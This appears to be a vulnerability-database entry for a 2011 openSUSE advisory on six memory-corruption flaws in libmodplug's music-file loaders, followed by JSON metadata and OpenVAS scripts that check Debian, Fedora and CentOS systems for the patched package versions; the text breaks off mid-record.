libmodplug: Fixed multiple vulnerabilities reported in <= 0.8.8.3 (important)
2011-08-24T21:08:24
ID OPENSUSE-SU-2011:0943-1 Type suse Reporter Suse Modified 2011-08-24T21:08:24
Description
This update of libmodplug0 fixes the following issues:
1) An integer overflow error exists within the
"CSoundFile::ReadWav()" function (src/load_wav.cpp) when
processing certain WAV files. This can be exploited to
cause a heap-based buffer overflow by tricking a user into
opening a specially crafted WAV file. (CVE-2011-2911)
2) Boundary errors within the "CSoundFile::ReadS3M()"
function (src/load_s3m.cpp) when processing S3M files can
be exploited to cause stack-based buffer overflows by
tricking a user into opening a specially crafted S3M file.
(CVE-2011-2912)
3) An off-by-one error within the "CSoundFile::ReadAMS()"
function (src/load_ams.cpp) can be exploited to cause a
stack corruption by tricking a user into opening a
specially crafted AMS file. (CVE-2011-2913)
4) An off-by-one error within the "CSoundFile::ReadDSM()"
function (src/load_dms.cpp) can be exploited to cause a
memory corruption by tricking a user into opening a
specially crafted DSM file. (CVE-2011-2914)
5) An off-by-one error within the "CSoundFile::ReadAMS2()"
function (src/load_ams.cpp) can be exploited to cause a
memory corruption by tricking a user into opening a
specially crafted AMS file. (CVE-2011-2915)
Also an overflow in the ABC loader was fixed.
(CVE-2011-1761)
{"bulletinFamily": "unix", "hash": "4475675193b6a9d55dfd555bb3a843ae7a984e2f81e86deb0d38270b7794d0ad", "id": "OPENSUSE-SU-2011:0943-1", "lastseen": "2016-09-04T11:29:41", "description": "This update of libmodplug0 fixes the following issues:\n\n 1) An integer overflow error exists within the\n "CSoundFile::ReadWav()" function (src/load_wav.cpp) when\n processing certain WAV files. This can be exploited to\n cause a heap-based buffer overflow by tricking a user into\n opening a specially crafted WAV file. (CVE-2011-2911)\n\n 2) Boundary errors within the "CSoundFile::ReadS3M()"\n function (src/load_s3m.cpp) when processing S3M files can\n be exploited to cause stack-based buffer overflows by\n tricking a user into opening a specially crafted S3M file.\n (CVE-2011-2912)\n\n\n 3) An off-by-one error within the "CSoundFile::ReadAMS()"\n function (src/load_ams.cpp) can be exploited to cause a\n stack corruption by tricking a user into opening a\n specially crafted AMS file. (CVE-2011-2913)\n\n 4) An off-by-one error within the "CSoundFile::ReadDSM()"\n function (src/load_dms.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted DSM file. (CVE-2011-2914)\n\n 5) An off-by-one error within the "CSoundFile::ReadAMS2()"\n function (src/load_ams.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted AMS file. (CVE-2011-2915)\n\n Also an overflow in the ABC loader was fixed.\n (CVE-2011-1761)\n\n", "objectVersion": "1.2", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "viewCount": 3, "published": "2011-08-24T21:08:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "references": ["https://bugzilla.novell.com/710726"], "reporter": "Suse", "edition": 1, "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "title": "libmodplug: Fixed multiple vulnerabilities reported in <= 0.8.8.3 (important)", "history": [], "modified": "2011-08-24T21:08:24", "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "type": "suse", "affectedPackage": [{"arch": "x86_64", "packageFilename": "libmodplug-devel-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.3", "operator": "lt", "packageName": "libmodplug-devel", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "x86_64", "packageFilename": "libmodplug-devel-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.4", "operator": "lt", "packageName": "libmodplug-devel", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "i586", "packageFilename": "libmodplug-devel-0.8.8.4-2.2.1.i586.rpm", "OSVersion": "11.3", "operator": "lt", "packageName": "libmodplug-devel", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "x86_64", "packageFilename": "libmodplug0-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.3", "operator": "lt", "packageName": "libmodplug0", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "x86_64", "packageFilename": "libmodplug0-32bit-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.3", "operator": "lt", "packageName": "libmodplug0-32bit", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "i586", "packageFilename": "libmodplug0-0.8.8.4-2.2.1.i586.rpm", "OSVersion": "11.4", "operator": "lt", "packageName": "libmodplug0", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "i586", "packageFilename": "libmodplug0-0.8.8.4-2.2.1.i586.rpm", "OSVersion": "11.3", "operator": "lt", "packageName": "libmodplug0", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "x86_64", "packageFilename": "libmodplug0-32bit-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.4", "operator": "lt", "packageName": "libmodplug0-32bit", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "x86_64", "packageFilename": "libmodplug0-0.8.8.4-2.2.1.x86_64.rpm", "OSVersion": "11.4", "operator": "lt", "packageName": "libmodplug0", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}, {"arch": "i586", "packageFilename": "libmodplug-devel-0.8.8.4-2.2.1.i586.rpm", "OSVersion": "11.4", "operator": "lt", "packageName": "libmodplug-devel", "packageVersion": "0.8.8.4-2.2.1", "OS": "openSUSE"}]}
{"openvas": [{"lastseen": "2017-07-24T12:50:46", "references": [], "pluginID": "71142", "description": "The remote host is missing an update to libmodplug\nannounced via advisory DSA 2415-1.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-03-12T00:00:00", "title": "Debian Security Advisory DSA 2415-1 (libmodplug)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=71142", "id": "OPENVAS:71142", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2415_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2415-1 (libmodplug)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities that can lead to the execution of arbitrary code\nhave been discovered in libmodplug, a library for mod music based on\nModPlug. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1761\n\nepiphant discovered that the abc file parser is vulnerable to several\nstack-based buffer overflows that potentially lead to the execution\nof arbitrary code.\n\nCVE-2011-2911\n\nHossein Lotfi of Secunia discovered that the CSoundFile::ReadWav\nfunction is vulnerable to an integer overflow which leads to a\nheap-based buffer overflow. An attacker can exploit this flaw to\npotentially execute arbitrary code by tricking a victim into opening\ncrafted WAV files.\n\nCVE-2011-2912\n\nHossein Lotfi of Secunia discovered that the CSoundFile::ReadS3M\nfunction is vulnerable to a stack-based buffer overflow. An attacker\ncan exploit this flaw to potentially execute arbitrary code by\ntricking a victim into opening crafted S3M files.\n\nCVE-2011-2913\n\nHossein Lotfi of Secunia discovered that the CSoundFile::ReadAMS\nfunction suffers from an off-by-one vulnerability that leads to\nmemory corruption. An attacker can exploit this flaw to potentially\nexecute arbitrary code by tricking a victim into opening crafted AMS\nfiles.\n\nCVE-2011-2914\n\nIt was discovered that the CSoundFile::ReadDSM function suffers\nfrom an off-by-one vulnerability that leads to memory corruption.\nAn attacker can exploit this flaw to potentially execute arbitrary\ncode by tricking a victim into opening crafted DSM files.\n\nCVE-2011-2915\n\nIt was discovered that the CSoundFile::ReadAMS2 function suffers\nfrom an off-by-one vulnerability that leads to memory corruption.\nAn attacker can exploit this flaw to potentially execute arbitrary\ncode by tricking a victim into opening crafted AMS files.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze2.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nhas been fixed in version 1:0.8.8.4-1.\n\nWe recommend that you upgrade your libmodplug packages.\";\ntag_summary = \"The remote host is missing an update to libmodplug\nannounced via advisory DSA 2415-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202415-1\";\n\nif(description)\n{\n script_id(71142);\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-12 11:31:30 -0400 (Mon, 12 Mar 2012)\");\n script_name(\"Debian Security Advisory DSA 2415-1 (libmodplug)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmodplug-dev\", ver:\"1:0.8.8.1-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmodplug1\", ver:\"1:0.8.8.1-1+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:03:21", "references": ["2011-10544", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html"], "pluginID": "1361412562310863425", "description": "Check for the Version of libmodplug", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-19T00:00:00", "title": "Fedora Update for libmodplug FEDORA-2011-10544", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310863425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863425", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10544\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 15\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863425\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-19 15:17:22 +0200 (Fri, 19 Aug 2011)\");\n script_xref(name: \"FEDORA\", value: \"2011-10544\");\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10544\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:25", "references": ["2011-10544", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html"], "pluginID": "863425", "description": "Check for the Version of libmodplug", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for libmodplug FEDORA-2011-10544", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863425", "id": "OPENVAS:863425", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10544\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 15\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html\");\n script_id(863425);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-19 15:17:22 +0200 (Fri, 19 Aug 2011)\");\n script_xref(name: \"FEDORA\", value: \"2011-10544\");\n script_cve_id(\"CVE-2011-1761\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10544\");\n\n script_summary(\"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:22", "references": ["2011-10452", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html"], "pluginID": "863809", "description": "Check for the Version of libmodplug", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-03-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for libmodplug FEDORA-2011-10452", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-01-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863809", "id": "OPENVAS:863809", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10452\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 16\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\");\n script_id(863809);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:03 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name: \"FEDORA\", value: \"2011-10452\");\n script_name(\"Fedora Update for libmodplug FEDORA-2011-10452\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libmodplug\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmodplug\", rpm:\"libmodplug~0.8.8.4~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:55", "references": ["http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html", "2011:1264"], "pluginID": "1361412562310880974", "description": "Check for the Version of gstreamer-plugins", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-09-12T00:00:00", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310880974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880974", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n \n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"gstreamer-plugins on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880974\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-12 16:29:49 +0200 (Mon, 12 Sep 2011)\");\n script_xref(name: \"CESA\", value: \"2011:1264\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\",\n \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of gstreamer-plugins\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:59:24", "references": ["2011-10452", "http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html"], "pluginID": "1361412562310863809", "description": "Check for the Version of libmodplug", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-03-19T00:00:00", "title": "Fedora Update for libmodplug FEDORA-2011-10452", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310863809", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863809", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libmodplug FEDORA-2011-10452\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"libmodplug on Fedora 16\";\ntag_insight = \"Modplug mod music file format library.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-August/064279.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863809\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", 